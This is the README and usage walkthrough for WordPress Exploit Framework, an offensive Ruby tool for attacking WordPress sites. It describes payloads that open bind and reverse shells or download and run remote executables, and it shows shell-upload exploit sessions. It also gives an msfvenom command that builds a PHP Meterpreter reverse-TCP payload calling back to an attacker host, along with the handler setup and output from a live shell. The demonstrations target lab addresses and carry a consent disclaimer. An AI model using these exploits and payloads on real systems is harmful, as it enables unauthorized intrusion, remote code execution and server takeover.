A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running
If bundler is not present on your system, you can install it by running
gem install bundler.
If you have issues installing WPXF’s dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch
It’s possible that you don’t have important development header files installed on your system. Here’s what you should do if you should find yourself in this situation:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running
Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using the
search command or load a module using the
Loading a module into your environment will allow you to set options with the
set command and view information about the module using
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully
For a full list of supported commands, take a look at This Wiki Page.
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
All these payloads, with the exception of
custom, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.
Copyright (C) 2015 rastating
Running WordPress Exploit Framework against websites without prior mutual consent may be illegal in your country. The author and parties involved in its development accept no liability and are not responsible for any misuse or damage caused by WordPress Exploit Framework.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, seehttp://www.gnu.org/licenses/.
Establishing a Meterpreter Session Using a Custom Payload + Demovideo
Creating the Meterpreter payload
The first step we’ll need to take is to create the payload that we’ll use with the exploit. To do this, we’ll use
msfvenom which comes with Metasploit. In this example, we’re going to use the
Run the following command, replacing the address specified with the address of the host machine you intend to run the reverse TCP handler on:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.213 -o meterpreter.php
This will generate and save the payload into a file called
meterpreter.php in the current working directory.
Metasploit contains a module which will let us just fire up a handler without running an exploit against any particular target. Start the handler by using the
exploit/multi/handler module in Metasploit by using the below commands at an msf shell:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.213 LHOST => 192.168.1.213 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.1.213:4444 [*] Starting the payload handler...
You’ll notice, the LHOST option we set here matches the LHOST option we set when using
msfvenom. Once the handler is running, we’re ready to switch to WPXF to exploit the target.
For this example, we’ll use the generic
admin_shell_upload module. Load this module by using
use exploit/admin_shell_upload and set the options to point it at the target host.
Once all the required options have been set, load the
custom payload and set the
payload_pathoption to point at the
meterpreter.php file we generated earlier using
wpxf [exploit/admin_shell_upload] > set payload custom [+] Loaded payload: #<Wpxf::Payloads::Custom:0x456e490> wpxf [exploit/admin_shell_upload] > set payload_path D:\meterpreter.php [+] Set payload_path => D:\meterpreter.php wpxf [exploit/admin_shell_upload] >
Execute the module using the
run command and we’ll now see WPXF upload and execute the payload, and see the session establish in Metasploit:
[-] Authenticating with WordPress using root:toor... [-] Uploading payload... [-] Executing the payload at http://192.168.1.15/wordpress/wp-content/plugins/imWNCKWQaH/gXGaaiwVND.php... [+] Execution finished successfully
[*] Sending stage (33068 bytes) to 192.168.1.15 [*] Meterpreter session 1 opened (192.168.1.213:4444 -> 192.168.1.15:38899) at 2016-01-18 17:36:46 -0500 meterpreter > sysinfo Computer : ubuntu OS : Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 Meterpreter : php/php meterpreter > getuid Server username: www-data (33) meterpreter >